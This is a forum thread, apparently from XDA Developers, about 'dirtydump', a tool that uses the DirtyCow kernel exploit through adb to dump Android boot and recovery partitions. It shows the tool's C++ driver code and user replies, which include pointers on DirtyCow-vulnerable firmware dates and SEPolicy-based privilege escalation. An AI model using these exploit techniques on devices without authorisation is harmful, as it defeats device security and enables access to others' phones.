// Process finished
if (prc == 1)
break;
}
/*
* When finish or an error received from adb, <startwrite> is set to false.
* If set to true, a NULL string has been received before receiving a DUMP_END or DUMP_ERROR.
* So, so we display an error.
*/
if (startwrite)
{
cerr << "Error during the process !" << endl;
prc = errno;
}
fclose(fc);
}
else
{
cerr << "Error running <adb logcat -s recowvery" << endl;
}
return prc;
}
/** main **/
int main(int argc, char** argv)
{
int ret = 0;
string filename;
if (argc == 1)
{
help();
return ret;
}
/* Fix for windows
* If run in same directory as the exe, return only the exe name without folder where it run.
* So, if DIRECTORY_SEPARATOR not found in argv_str, appDirectory = "." for linux, mac and windows
*/
string argv_str(argv[0]);
if (argv_str.find_last_of(DIRECTORY_SEPARATOR) != string::npos)
appDirectory = argv_str.substr(0, argv_str.find_last_of(DIRECTORY_SEPARATOR));
else
appDirectory = string(".");
ret = init();
if (ret != 0)
return ret;
if (string(argv[1]) == "boot")
{
ret = runExploit(BOOT);
filename = "boot.img";
}
else
{
ret = runExploit(RECOVERY);
filename = "recovery.img";
}
if (ret != 0)
return ret;
else
{
fsout = fopen(filename.c_str(), "wb");
if (!fsout)
{
cerr << "Can't open or create file : <" << string(filename) << ">" << endl;
rebootDevice();
return errno;
}
else
{
ret = readFromLogcat();
fclose(fsout);
}
cout << endl;
cout << "Image file saved here :" << endl;
cout << " " << appDirectory << string(DIRECTORY_SEPARATOR) << string(filename) << endl;
cout << endl;
}
cout << "Rebooting your device..." << endl;
ret = rebootDevice();
return ret;
}
Note :
There is only linux binary, the windows version come soon.
(I don't know why Windows don't work as expected :x)
If you are interested by the source code, I can attach it.
Tested and build from Ubuntu 16.04 (x64) / Code::Blocks & gedit.
If any bug, I will do the best to solve this.
So sorry for my english, or any misspelling :x
Hey man great work
I was in need of such a tool
I needed the recovery partition for andromax x58
Though I dont own the phone its for someone(yeah you understand it right)
And now finally ported Twrp to it
please make compatible for 32 bit device
Hi,
Normaly, it may work for 32bit device, but can't test it :/
Can you give me error log, text displayed on your terminal please ?
And if possible, what do you have when you do : "adb shell uname -a" ? (because I detect 32 or 64bits device by this)
Regards,
Vincent
could you please post the dirty dump executable source code so i can port it to windows?
or just tell me how you determind what binary the device needs?
Ricky Divjakovski said:
could you please post the dirty dump executable source code so i can port it to windows?
or just tell me how you determind what binary the device needs?
Click to expand...
Click to collapse
The boss Appear.What a pleasant thing it is.
China user
Ricky Divjakovski said:
could you please post the dirty dump executable source code so i can port it to windows?
or just tell me how you determind what binary the device needs?
Click to expand...
Click to collapse
Hi and sorry for the time to answer...
I've added the source code at the end of the first post
The Hard Gamer said:
Hey man great work
I was in need of such a tool
I needed the recovery partition for andromax x58
Though I dont own the phone its for someone(yeah you understand it right)
And now finally ported Twrp to it
Click to expand...
Click to collapse
Hai Bro,what command you issue in linux to run ?
Thks
Hmm this is awesome except the part it doesn't work on Ubuntu 14.04 and source code need gcc-4.9 to build (not sure).
Anyway I will install Ubuntu 16.04 to make new things to LG K4 (2016) [MTK MT6735m], good job thanks for it
@Vince_02100 what compilers did you used to applypatch and app_process64?
I need to compile a version to armv7(aka 32), since my current device (the LG K4) have a x32 Android and a x64 CPU.
I'm improving your dirtydump but with limitations since I don't know much about C/C++.
Please reply or PM me, anyway I will try my best to make it x32 support
@Vince_02100
My question is, did you base the operation of your tool on the dirtycow exploit? Seems like it because of its name and reference to jcadduono.
This is actually awesome then because I have a tool very similar only it works as a shell command handler. The Greyhat Root Console essentially is it's own Terminal Interface specifically to use dirtycow for root shell commands.
I only bring that up because Stock OEM builds that are dated October 2016 or later pretty much can't utilize CVE-2016-5195. Some didn't get patched that soon but most did. The rule of thumb I've always had when working with Dirtycow is to use stock builds from September 2016. Since they are the most up to date builds still vulnerable. I don't know how many people reading this thread know that.
Here is the thread I made where @droidvoider explains how to use the Greyhat Root Console: https://forum.xda-developers.com/android/help/injecting-root-setting-selinux-stages-t3573036
The thread also details our journey into modifying the Device SEPolicy using the console in order to elevate our normal user privileges. We have the instructions to build the Console for both 32-Bit and 64-Bit Builds of Android 5.1.1 & 6.0.1
I think the source code and our thread may just give you some good insight going forward with your tool, even though The Greyhat Root Console was developed on an AT&T Galaxy Note 5. That thread is a gold mine for dirtycow information.
Thanks for your great tool and explanation @Vince_02100. I'm researching to dump boot, recovery for Onkyo DP-CMX1 to make custom TWRP. I have some stupid questions and need your help like following:
1. Tool will not break system partition and it can boot normally after dumping recovery, boot?
2. I don't have root so how can I copy dumped files: ./boot.img , ./recovery.img to /sdcard or to computer? Do I edit your code
fp = fopen(blockDev, "r"); to make it write to /sdcard/boot.img?

Categories

Resources